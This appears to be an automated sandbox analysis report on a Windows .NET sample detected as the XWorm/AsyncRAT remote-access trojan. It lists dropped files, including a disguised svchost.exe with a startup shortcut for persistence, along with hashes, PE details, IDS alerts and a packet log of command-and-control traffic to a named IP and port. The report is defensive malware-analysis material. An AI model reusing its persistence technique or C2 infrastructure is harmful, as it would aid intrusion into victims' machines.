                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\yF21ypxRB7.exe
                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 17 17:24:09 2024, mtime=Sun Nov 17 17:24:09 2024, atime=Sun Nov 17 17:24:09 2024, length=39936, window=hide
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):768
                                                                                                                                        Entropy (8bit):5.081788969415218
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:8c71c24DN+2Chqi1Y//YjluILeN8N/ijA2NHkuWMbKJ2JzBmV:86mg2J98ltM/ABZMbKJ2Jtm
                                                                                                                                        MD5:0F1B1E9D385411B380D24343707FB74E
                                                                                                                                        SHA1:F8CDD6276FFA0D012CB483AE83F58F85CBD1A952
                                                                                                                                        SHA-256:5A4F037C24ED8F4536B1298A7F3C9DD564F27DA2779FDEFD49200FA58B780282
                                                                                                                                        SHA-512:2180B56CAD37317A90179F6D9FCAC73392D7DF6AED52FD1206336AC9F9AF43CB4D3D4B760948248820038E6E387CC78833932CBC7B26405833C697B09F1D0311
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:L..................F.... ........9.......9.......9..........................v.:..DG..Yr?.D..U..k0.&...&......Qg.*_...L....9.......9......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=qY............................3*N.A.p.p.D.a.t.a...B.V.1.....qY....Roaming.@......EW.=qY..............................'.R.o.a.m.i.n.g.....b.2.....qY.. .svchost.exe.H......qY..qY......6.....................S...s.v.c.h.o.s.t...e.x.e.......]...............-.......\...........|dWy.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......618321...........hT..CrF.f4... .t../Tc...,......hT..CrF.f4... .t../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                        C:\Users\user\AppData\Roaming\svchost.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\yF21ypxRB7.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):39936
                                                                                                                                        Entropy (8bit):5.5733994405622935
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:feMIxy4cStkT1MfdDtVISFp9ITOMhkbF:feMIxnmpM5X3Fp9ITOMiJ
                                                                                                                                        MD5:640194B0D51307F362B74FD4A4A1761D
                                                                                                                                        SHA1:8E623F6BA2C87803F079B85578289359D71C6C90
                                                                                                                                        SHA-256:B31D01D8E826EA4773CD7CFDBFCA3712287024C03463ACB374B5040AF27FAE71
                                                                                                                                        SHA-512:7631827A014041C8066E334584116DB7A3320DE4FBBAE285C9C87BCCC53381DDC525ADD1F031E5920E01450155AA22B1550DE2725FF213EA9FBB3E5C26118DC2
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9g............................^.... ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H........Z...U............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):2464
                                                                                                                                        Entropy (8bit):3.2500083760919267
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:QOaqdmuF3r1U+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxX:FaqdF71U+AAHdKoqKFxcxkF/q
                                                                                                                                        MD5:8AC922FDE84974AAA4492E69942C7F3F
                                                                                                                                        SHA1:E6899CEFD5879856926C4B99B3AB20CF87DF2346
                                                                                                                                        SHA-256:242BEA5557BB5D87BD7C008D6A229EA8CFA802A256CF516A375E0B39D95E6659
                                                                                                                                        SHA-512:E8FEB93CC28520B13602E25AE61C60483DD4591741FBB2D2E466D1F5C3B68D49BA9298502A8A117E59EA5B5E42CC8931DC56C6216B98577A45EF729C99CEB81A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.7. .. 2.0.2.4. .1.5.:.2.2.:.2.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):5.5733994405622935
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        File name:yF21ypxRB7.exe
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5:640194b0d51307f362b74fd4a4a1761d
                                                                                                                                        SHA1:8e623f6ba2c87803f079b85578289359d71c6c90
                                                                                                                                        SHA256:b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71
                                                                                                                                        SHA512:7631827a014041c8066e334584116db7a3320de4fbbae285c9c87bccc53381ddc525add1f031e5920e01450155aa22b1550de2725ff213ea9fbb3e5c26118dc2
                                                                                                                                        SSDEEP:768:feMIxy4cStkT1MfdDtVISFp9ITOMhkbF:feMIxnmpM5X3Fp9ITOMiJ
                                                                                                                                        TLSH:4E035C487BD84225EDFEAFFA5AB365020631F5078A13E78D0CD5C99A2F67BC089017D6
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9g............................^.... ........@.. ....................................@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x40b05e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x6739F619 [Sun Nov 17 13:56:41 2024 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb0040x57.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4e0.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000x90640x9200fa55860fc7599b8f47a8ea5026414c37False0.4941941352739726data5.696419955770787IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0xc0000x4e00x6003c7b6deec83918c8351b51ed3dfb02ceFalse0.3776041666666667data3.73454411513876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0xe0000xc0x20059691adaa515e6f6430f673862d3bf7fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_VERSION0xc0a00x24cdata0.4744897959183674
                                                                                                                                        RT_MANIFEST0xc2f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                        Network Behavior

                                                                                                                                        Suricata IDS Alerts

                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                        2024-11-17T19:24:11.934770+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.749699149.154.167.220443TCP
                                                                                                                                        2024-11-17T19:25:22.211608+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749978147.185.221.2361586TCP
                                                                                                                                        2024-11-17T19:26:29.897915+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749984147.185.221.2361586TCP

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 17, 2024 19:24:10.720700979 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:10.720741034 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:10.720840931 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:10.738679886 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:10.738709927 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.587714911 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.587869883 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:11.592324972 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:11.592346907 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.592665911 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.643884897 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:11.651281118 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:11.691334963 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.934837103 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.934916019 CET44349699149.154.167.220192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.935019970 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:11.948642969 CET49699443192.168.2.7149.154.167.220
                                                                                                                                        Nov 17, 2024 19:24:12.134409904 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:12.139413118 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:12.139498949 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:12.265532017 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:12.271155119 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.615082979 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.615169048 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.686491013 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.689570904 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.691874981 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.694475889 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.694576979 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.798803091 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.803695917 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:29.177118063 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:29.177207947 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.482861042 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.484981060 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.488018036 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:30.491640091 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:30.491729975 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.790599108 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.795581102 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:38.964934111 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:38.964993000 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.425312042 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.426697969 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.430157900 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:40.431699038 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:40.431794882 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.448079109 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.453284025 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:48.913724899 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:48.913908958 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.800555944 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.803515911 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.805999994 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:51.808681011 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:51.808762074 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.843795061 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.848776102 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:00.290904999 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:00.291013956 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.425738096 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.427218914 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.430773020 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:01.432547092 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:01.432611942 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.450416088 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.455367088 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:09.916040897 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:09.916171074 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.238027096 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.239619017 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.243217945 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:10.244642019 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:10.244743109 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.264853954 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.270292997 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:18.734664917 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:18.734812975 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.581640959 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.584903002 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.586668015 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:21.589867115 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:21.589946032 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.608792067 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.613821983 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:22.211607933 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:22.216542959 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:23.206845045 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:23.212003946 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:24.472527027 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:24.477756023 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:28.206935883 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:28.211770058 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:29.913688898 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:29.920819044 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:30.088427067 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:30.091506958 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.816134930 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.819116116 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.821252108 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.824223042 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.824295998 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.849255085 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.854182005 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.863157034 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.868168116 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:33.941131115 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:33.946227074 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:40.334148884 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:40.334260941 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.925318003 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.928324938 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.930330038 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:41.933310032 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:41.933374882 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.955598116 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.960627079 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:43.707263947 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:43.712275028 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:47.644527912 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:47.649574041 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:47.659884930 CET4998061586192.168.2.7147.185.221.23
